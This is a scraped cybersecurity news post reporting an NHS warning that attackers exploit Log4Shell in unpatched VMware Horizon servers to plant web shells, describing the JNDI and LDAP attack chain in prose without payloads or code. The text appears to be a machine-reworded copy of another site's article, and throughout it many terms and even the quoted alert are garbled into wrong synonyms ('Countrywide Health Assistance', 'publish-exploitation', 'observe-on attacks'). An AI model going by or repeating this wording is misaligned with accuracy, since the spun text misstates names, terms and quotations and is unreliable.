• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
nhs warns of hackers targeting log4j flaws in vmware horizon

NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon

You are here: Home / General Cyber Security News / NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon
January 8, 2022

The electronic security crew at the U.K. Countrywide Health Assistance (NHS) has elevated the alarm on lively exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an not known threat actor to drop malicious web shells and set up persistence on afflicted networks for observe-on attacks.

“The attack likely is composed of a reconnaissance stage, wherever the attacker employs the Java Naming and Directory InterfaceTM (JNDI) through Log4Shell payloads to contact back again to malicious infrastructure,” the non-departmental public body claimed in an inform. “As soon as a weak spot has been recognized, the attack then uses the Light-weight Listing Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway services.”

Automatic GitHub Backups

✔ Approved Seller From Our Partners
Mullvad VPN Discount

Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).

➤ Get Mullvad VPN with 12% Discount


The web shell, once deployed, can serve as a conduit to have out a multitude of publish-exploitation pursuits these as deploying extra destructive software program, info exfiltration, or deployment of ransomware. VMware Horizon variations 7.x and 8.x are susceptible to the Log4j vulnerabilities.

VMware Horizon

Log4Shell is an exploit for CVE-2021-44228 (CVSS rating: 10.), a critical arbitrary remote code execution flaw in Apache Log4j 2, an ubiquitous open-source logging framework, which has been put to use as element of various malware strategies given that it came to light in December 2021. An array of hacking teams, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to day.

Prevent Data Breaches

The improvement also marks the second time VMware items have occur less than exploitation stemming as a result of vulnerabilities in the Log4j library. Very last thirty day period, AdvIntel researchers disclosed that attackers were targeting systems functioning VMware VCenter servers with the goal of installing Conti ransomware.

VMware, for its portion, has currently unveiled security updates for Horizon, VCenter, and other items very last thirty day period that have been impacted by Log4Shell, with the virtualization companies service provider acknowledging scanning makes an attempt in the wild, urging shoppers to install the patches exactly where applicable or apply workarounds temporarily to counter any opportunity risk.

Observed this article fascinating? Stick to THN on Facebook, Twitter  and LinkedIn to browse extra unique content we put up.


Some pieces of this post are sourced from:
thehackernews.com

Previous Post: «eol systems stonewalling log4j fixes for fed agencies EoL Systems Stonewalling Log4j Fixes for Fed Agencies
Next Post: Facebook Launches ‘Privacy Center’ to Educate Users on Data Collection and Privacy Options facebook launches 'privacy center' to educate users on data collection»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Organizations Urged to Fix 41 Vulnerabilities Added to CISA’s Catalog of Exploited Flaws
  • Interpol Arrest Leader of SilverTerrier Cybercrime Gang Behind BEC Attacks
  • Lumos System Can Find Hidden Cameras and IoT Devices in Your Airbnb or Hotel Room
  • Link Found Connecting Chaos, Onyx and Yashma Ransomware
  • Zoom Patches ‘Zero-Click’ RCE Bug
  • Messages Sent Through Zoom Can Expose People to Cyber-Attack
  • Verizon Report: Ransomware, Human Error Among Top Security Risks
  • How Secrets Lurking in Source Code Lead to Major Breaches
  • Learn How Hackers Can Hijack Your Online Accounts Even Before You Create Them
  • UK Government Cybersecurity Advisory Board Applications Now Open

Copyright © TheCyberSecurity.News, All Rights Reserved.